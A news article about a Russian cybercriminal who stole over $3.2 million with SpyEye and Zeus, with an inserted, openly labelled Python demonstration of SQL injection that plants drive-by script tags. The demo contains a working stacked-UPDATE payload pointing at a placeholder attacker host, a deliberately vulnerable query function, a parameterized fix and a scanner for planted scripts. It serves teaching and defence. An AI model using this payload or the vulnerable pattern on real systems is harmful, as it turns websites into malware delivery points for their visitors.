Dubbed "Soldier" in the cybercrime underground, a hacker based in Russia siphoned more than $3.2 million over six months from victims that include major U.S. corporations as well as U.S. government and military systems.
Researchers at Tokyo-based security vendor Trend Micro Inc. discovered the operation and found that the U.S. was not the only target: a total of 25,000 systems were infected in more than 90 countries, including the U.K., Brazil, Mexico, Thailand, Turkey, Saudi Arabia, India, Romania and Canada.
The cybercriminal, believed to be in his early 20s, carried out the attacks with the SpyEye and Zeus crimeware toolkits, a network of money mules, and two accomplices believed to be located in California. To increase the number of successful infections in the U.S., he is believed to have bought U.S. web traffic from other cybercriminals.
Using SpyEye and Zeus, Soldier not only automated online banking fraud but also harvested credentials for sites such as Facebook, Yahoo, Google, eBay, Amazon, Twitter, PayPal and Skype. This pattern of attack is becoming increasingly common and is a growing problem for enterprises.
“This guy did not create this software, he bought it,” said Trend Micro’s global director of education David Perry. “This is commercially available crime. This is a very modern thing. He’s a mid-level criminal, not some super-genius.”
In August, McAfee uncovered a similar campaign that infiltrated enterprise and government networks. Operation Shady RAT exposed a command-and-control server holding data from more than 70 organizations, including U.S. government agencies, contractors, enterprises and entities in other countries, compromised over a five-year period. Those attacks relied on a standard spear phishing email that tried to get users to click a malicious link or trick them into giving up account credentials.
In the case Trend Micro uncovered, the attacker delivered most infections by planting malicious code on websites through SQL injection, turning those sites into drive-by downloads for visitors. In addition to the drive-by downloads, he spread the malware through infected network shares, USB sticks and mobile devices.
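The article does not publish the injection this attacker used, so the following is an added illustration (not code from the page or from Trend Micro) of the general pattern behind "planting malicious code using SQL injection": a search query built by string concatenation lets a stacked UPDATE append a script tag to every stored page body, so each page the site serves becomes a drive-by download. The table, rows, payload and the `attacker.invalid` host are all constructed for the example; `executescript()` stands in for a database driver that accepts stacked statements, which SQLite's plain `execute()` does not. The parameterized version treats the same input as data, and the last function is the defender's check for the footprint such a campaign leaves in a CMS database.

```python
import re
import sqlite3

# Constructed sample data: a small "news" table standing in for a site's CMS.
SAMPLE_ROWS = [
    ("Quarterly results", "Revenue rose 4% in Q2."),
    ("New office opens", "The Austin office opened on Monday."),
    ("Holiday schedule", "Offices close Dec 24-26."),
]

# Constructed payload modeled on mass SQL-injection campaigns: the search term
# closes the string literal, then a stacked UPDATE appends a script tag to every
# body. The host name is a placeholder, not a real indicator. SQLite uses || for
# string concatenation where SQL Server would use +.
PAYLOAD = (
    "x'; UPDATE news SET body = body || "
    "'<script src=\"http://attacker.invalid/x.js\"></script>'; --"
)

SCRIPT_TAG = re.compile(r"<script\b[^>]*>", re.IGNORECASE)


def make_db():
    """Fresh in-memory SQLite database seeded with the constructed rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE news (id INTEGER PRIMARY KEY, title TEXT, body TEXT)")
    conn.executemany("INSERT INTO news (title, body) VALUES (?, ?)", SAMPLE_ROWS)
    conn.commit()
    return conn


def search_vulnerable(conn, term):
    """Vulnerable: the search term is spliced into the SQL text.

    executescript() models a driver that permits stacked statements (several
    production drivers do), so everything after the attacker's closing quote
    runs as SQL and the UPDATE is applied to every row. Result rows are not
    returned; the point is the side effect on the table.
    """
    sql = "SELECT title FROM news WHERE title LIKE '%" + term + "%';"
    conn.executescript(sql)
    conn.commit()


def search_safe(conn, term):
    """Hardened: the term is bound as a parameter, so it can only ever be
    compared against titles, never parsed as SQL. Returns matching titles."""
    cur = conn.execute(
        "SELECT title FROM news WHERE title LIKE ?", ("%" + term + "%",)
    )
    return [row[0] for row in cur.fetchall()]


def find_planted_scripts(conn, table="news", columns=("title", "body")):
    """Defender's check: list (id, column) for every row whose text column
    carries a script tag. Table and column names come from the code, not from
    user input, since identifiers cannot be bound as parameters."""
    hits = []
    for col in columns:
        for row_id, value in conn.execute(f"SELECT id, {col} FROM {table}"):
            if value and SCRIPT_TAG.search(value):
                hits.append((row_id, col))
    return hits


if __name__ == "__main__":
    db = make_db()
    search_vulnerable(db, PAYLOAD)
    print("after vulnerable search:", find_planted_scripts(db))
    db = make_db()
    print("safe search results:", search_safe(db, PAYLOAD))
    print("after safe search:", find_planted_scripts(db))
```

Running the scanner against a real site's database is the quick triage step when a drive-by campaign is suspected: the injected tag shows up in every text column the attacker's UPDATE could reach, and the `src` value it carries is the indicator to block and hunt for in proxy logs.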
Many of the 25,000 infected systems belonged to employees of very large corporations. According to Perry, many victims' machines were infected at home and then carried into the office. "They opened a window of vulnerabilities," Perry said.
Trend researchers have been investigating the hacker since April and have notified authorities. The attack has been ongoing since January 2011. Researchers checked the IP addresses that were recorded in the SpyEye command-and-control server and discovered that “a wide variety of large organizations and U.S. multinational corporations in a variety of sectors were represented in the victim population,” wrote Trend Micro’s Loucif Kharouni, senior threat researcher, in a blog post.
The victims included Fortune 1000 companies as well as U.S. government, military, educational and research institutions, banks, airports, and automobile, media and technology companies.
Perry said he could not name the individual companies because of the ongoing investigation. He added that although all of the attack websites have been shut down, that will not stop the attacker from infecting more companies.
"This is the template for a lot of future crime," Perry said. "This is a milestone, not a big breaking news story. It's important as a user of the Internet that you realize it's having a profound effect on privacy. It's like the American Revolution in the amount of repercussions. We need to pay attention to how it affects personal privacy, safety and security."